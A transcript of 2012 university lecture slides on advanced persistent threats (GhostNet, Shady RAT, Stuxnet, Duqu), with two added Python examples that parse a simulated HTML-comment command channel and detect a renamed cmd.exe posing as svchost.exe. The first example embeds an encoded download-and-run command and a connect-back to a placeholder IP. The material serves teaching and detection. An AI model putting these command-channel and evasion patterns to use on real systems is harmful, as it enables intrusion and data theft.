Advanced Persistent Threats

Presentation Transcript


  1. Advanced Persistent Threats CS461/ECE422 Spring 2012

  2. Traditional Malware
  • Infect as many machines as possible; non-discriminating
  • The goal is the machine's resources, much less the information on the machine
  • Use CPU resources: sell DDoS capacity, sell spam capacity
  • Use the machine for storage: stash stolen or illicit data on the infected host
  • Use network resources: launch attacks directly from infected machines, or route them through infected machines
  • Even where information is the goal, the specific owner of the information is not important, e.g. harvesting credit card numbers or inserting extra bank transactions

  3. Advanced Persistent Threat (APT)
  • Has been around all along; it has just received more attention recently
  • The attacker cares about one specific target: a discriminating, narrow, focused attack
  • E.g., the attacker wants to find specific information inside a specific organization
  • May use more generic infection techniques along the way, but the ultimate goal is very specific

  4. Successful APT
  • Low volume: unlikely to appear in a standard virus-scanner or IDS signature base. Generally, the campaigns that do get discovered are not the particularly interesting ones
  • Evolving: perhaps changing with each campaign
  • Focused: merely being more secure than your neighbors may not be good enough

  5. Tibet GhostNet
  • http://en.wikipedia.org/wiki/GhostNet
  • Discovered March 2009
  • Infection initiated via targeted emails carrying infected attachments
  • The infected attachment installs a Trojan
  • The Trojan contacts a control server and waits for commands
  • One command installed Gh0st RAT, which gives the attacker complete control of a Windows system

  6. Shady RAT
  • RAT = Remote Access Trojan
  • Report released by McAfee in August 2011: www.mcafee.com/us/resources/white.../wp-operation-shady-rat.pdf
  • Reviewed the logs of one command-and-control (C&C) server, starting from 2006
  • The botnet infiltrated many government and commercial organizations
  • Claimed a sophisticated attack and targeted information gathering
  • Concretely identified 71 infiltrated organizations

  7. How is the target computer infected?
  • Send emails to people at the target organization
  • Infected attachments, e.g. MS Word, Excel, PDF, PowerPoint
  • The victim opens the infected attachment; the resulting extra code execution installs a Trojan
  • The Trojan attempts to contact hard-coded sites
  • The sites serve HTML or JPEG files, which do not arouse much attention from the firewall or other network defenses
  • Commands are encrypted inside comments in the HTML file, or embedded in the JPEG using steganographic techniques
  • Example commands:
  • Run:{URL/Filename} – download and execute the file
  • Sleep:{number} – sleep for the specified time
  • Info from Symantec's review: http://www.symantec.com/connect/blogs/truth-behind-shady-rat
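The command channel described on this slide, worked through as an added example (not code from the slides or from Symantec's write-up): a controller hides a command block inside an HTML comment of an innocuous-looking page, the Trojan extracts and parses it, and a defender can scan proxy-captured HTML for comments that look like opaque encoded blobs. The encoding (base64 of '|'-separated commands), the sample page, the connect-back `ip:port` syntax and the detection thresholds are assumptions made for this example; the real Shady RAT encoding is described in the Symantec post linked above.

```python
"""
Added example (not from the slides or from Symantec): a hypothetical
Shady RAT-style command channel hidden in HTML comments, parsed from the
Trojan's side and flagged from the defender's side. Encoding, sample page
and thresholds are assumptions for this example.
"""
import base64
import binascii
import math
import re
from collections import Counter

# Constructed sample page. The hidden payload decodes to three commands of
# the kinds the slide lists: run a download, sleep, connect back to ip:port.
HIDDEN_PAYLOAD = base64.b64encode(
    b"Run:http://203.0.113.7/u.exe|Sleep:3600|203.0.113.7:443"
).decode("ascii")
SAMPLE_HTML = f"""<html><head><title>Weather</title></head>
<body>
<!-- main navigation -->
<p>Partly cloudy, high of 21.</p>
<!-- {HIDDEN_PAYLOAD} -->
</body></html>"""

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
RUN_RE = re.compile(r"^Run:(?P<target>\S+)$")
SLEEP_RE = re.compile(r"^Sleep:(?P<seconds>\d+)$")
CONNECT_RE = re.compile(r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d{1,5})$")


def extract_comments(html):
    """Return the bodies of all HTML comments, whitespace-stripped."""
    return [m.group(1).strip() for m in COMMENT_RE.finditer(html)]


def decode_payload(comment):
    """Base64-decode a comment body; return None if it is not valid base64."""
    if not BASE64_RE.match(comment):
        return None
    try:
        return base64.b64decode(comment, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def parse_commands(text):
    """Turn 'Run:...|Sleep:...|ip:port' into (verb, argument) tuples.

    Unknown tokens are kept as ('unknown', token) so an analyst sees them
    instead of silently losing them.
    """
    commands = []
    for token in text.split("|"):
        token = token.strip()
        if not token:
            continue
        if (m := RUN_RE.match(token)):
            commands.append(("run", m.group("target")))
        elif (m := SLEEP_RE.match(token)):
            commands.append(("sleep", int(m.group("seconds"))))
        elif (m := CONNECT_RE.match(token)):
            commands.append(("connect", (m.group("ip"), int(m.group("port")))))
        else:
            commands.append(("unknown", token))
    return commands


def extract_commands(html):
    """Trojan-side view: every decodable command hidden in the page."""
    commands = []
    for comment in extract_comments(html):
        decoded = decode_payload(comment)
        if decoded is not None:
            commands.extend(parse_commands(decoded))
    return commands


def shannon_entropy(s):
    """Bits per character; encoded blobs score well above English comments."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_comments(html, min_len=24, min_entropy=3.5):
    """Defender-side view: comments that look like opaque encoded blobs.

    A 'main navigation'-style comment is short, contains spaces and is
    low-entropy; a base64 command block is long, drawn only from the
    base64 alphabet and high-entropy. Thresholds are assumptions; tune
    them against your own traffic before alerting on them.
    """
    hits = []
    for comment in extract_comments(html):
        if (len(comment) >= min_len
                and BASE64_RE.match(comment)
                and shannon_entropy(comment) >= min_entropy):
            hits.append(comment)
    return hits


if __name__ == "__main__":
    print("commands:", extract_commands(SAMPLE_HTML))
    print("suspicious comments:", suspicious_comments(SAMPLE_HTML))
```

The detection side is deliberately weak on its own (many legitimate pages carry long opaque comments); it is a triage filter to pair with the network signals on the slide, such as a workstation fetching the same static HTML or JPEG from a hard-coded host on a fixed interval.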

  8. Using the machine once it's infected
  • Using the {IP Address}:{port} command, the Trojan connects to the remote server
  • It copies cmd.exe to svchost.exe and launches the renamed cmd shell to listen on the port
  • Lots of instances of svchost.exe run on a Windows machine, so one more does not stand out
  • This gives the attacker almost complete freedom to launch their attack from the infected machine
  • Does not use very sophisticated techniques
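A triage check for the trick on this slide, as an added example (not part of the slides or of any vendor tooling): a genuine svchost.exe lives in %SystemRoot%\System32 (or SysWOW64) and is started by services.exe, whereas a copy of cmd.exe renamed to svchost.exe and launched from an Office process breaks both rules and has the same file hash as cmd.exe. The process snapshot and the "disk" contents below are constructed for the example; in practice they would come from a process listing, a socket listing and real file hashes.

```python
"""
Added example (not from the slides): flag svchost.exe processes that look
like a renamed cmd.exe. The process snapshot and the fake disk contents
are constructed for this example.
"""
import hashlib

# What a real svchost.exe looks like on disk and in the process tree.
EXPECTED_SVCHOST_PATHS = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\syswow64\svchost.exe",
}
EXPECTED_SVCHOST_PARENT = "services.exe"

# Constructed "disk": path -> file bytes. Real code would hash the files.
# The Temp copy is byte-identical to cmd.exe, exactly as the slide describes.
FAKE_DISK = {
    r"C:\Windows\System32\svchost.exe": b"MZ...genuine-svchost-image...",
    r"C:\Windows\System32\cmd.exe": b"MZ...genuine-cmd-image...",
    r"C:\Users\victim\AppData\Local\Temp\svchost.exe": b"MZ...genuine-cmd-image...",
}

# Constructed process snapshot: the fields a process list plus a socket
# list would give you (name, image path, parent process, listening ports).
PROCESSES = [
    {"pid": 612, "name": "svchost.exe",
     "path": r"C:\Windows\System32\svchost.exe",
     "parent": "services.exe", "listening": [135]},
    {"pid": 4120, "name": "WINWORD.EXE",
     "path": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "parent": "explorer.exe", "listening": []},
    {"pid": 4188, "name": "svchost.exe",
     "path": r"C:\Users\victim\AppData\Local\Temp\svchost.exe",
     "parent": "WINWORD.EXE", "listening": [4444]},
]


def sha256_of(path, disk=FAKE_DISK):
    """SHA-256 of the file at path, or None if it is not on the (fake) disk."""
    data = disk.get(path)
    return None if data is None else hashlib.sha256(data).hexdigest()


def cmd_exe_hashes(disk=FAKE_DISK):
    """Hashes of every cmd.exe on disk; a renamed copy will match one."""
    return {sha256_of(p, disk) for p in disk if p.lower().endswith(r"\cmd.exe")}


def check_svchost(proc, disk=FAKE_DISK):
    """Return the reasons a process named svchost.exe looks like a renamed shell."""
    reasons = []
    if proc["name"].lower() != "svchost.exe":
        return reasons
    if proc["path"].lower() not in EXPECTED_SVCHOST_PATHS:
        reasons.append(f"unexpected image path {proc['path']}")
    if proc["parent"].lower() != EXPECTED_SVCHOST_PARENT:
        reasons.append(f"parent is {proc['parent']}, expected services.exe")
    if sha256_of(proc["path"], disk) in cmd_exe_hashes(disk):
        reasons.append("image hash matches cmd.exe")
    # A genuine svchost hosts listening services (RPC on 135, for instance),
    # so an open port only counts once the process is already anomalous.
    if reasons and proc["listening"]:
        reasons.append(f"listening on {proc['listening']}")
    return reasons


def find_rogue_svchost(processes=PROCESSES, disk=FAKE_DISK):
    """Map pid -> reasons for every svchost.exe that fails the checks."""
    findings = {}
    for proc in processes:
        reasons = check_svchost(proc, disk)
        if reasons:
            findings[proc["pid"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in find_rogue_svchost().items():
        print(pid, "->", "; ".join(reasons))
```

The hash rule is the decisive one: path and parent can be faked by a more careful attacker, but a byte-for-byte copy of cmd.exe hashes like cmd.exe no matter what it is called.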

  9. Stuxnet
  • Came to public attention in June 2010, but in hindsight appears to date back to November 2008
  • Symantec analysis: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf
  • Truly more sophisticated
  • Replicates via removable drives (jumping the air gap)
  • Also leverages SMB and print-spooler vulnerabilities, plus much more
  • Sophisticated binary hiding and execution
  • Targets a specific industrial control system (a Siemens PLC) and ultimately rootkits that PLC
  • Reportedly the code altered the behavior of centrifuges in a subtle way: enough to spoil the result of the centrifuging, but not enough for the operator to notice right away

  10. W32.Duqu
  • Probable evolution of the Stuxnet code base
  • Reports released around October 2011
  • Symantec report: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf
  • The original infection vectors are still being worked out
  • One appears to be a zero-day exploited through an MS Word document: http://www.symantec.com/connect/w32-duqu_status-updates_installer-zero-day-exploit
  • Execution of the infection starts through a registered device driver, which is loaded at system boot
  • The device driver is signed with a valid code-signing certificate, so it does not raise attention
  • The driver injects the main DLL into services.exe
  • The main DLL is encrypted on disk; the key is stored in the registry

  11. Duqu loading
  • Performs basic anti-debugging checks: are debugger-type processes running?
  • Uninstalls itself after it has been running for 36 days
  • The next stage is loaded from an encrypted resource in the main DLL; the resource is decrypted into memory
  • The new DLL is injected into a standard process such as explorer.exe
  • The newly injected code is a payload loader: it gets its instructions from the C&C
  • It uses rootkit techniques to execute the payload bytes (a LoadLibrary-style load) without ever writing them to disk
  • Ultimately, the malware appears to install information-stealing software
  • Appears to exchange data with the C&C via information embedded in JPEG files
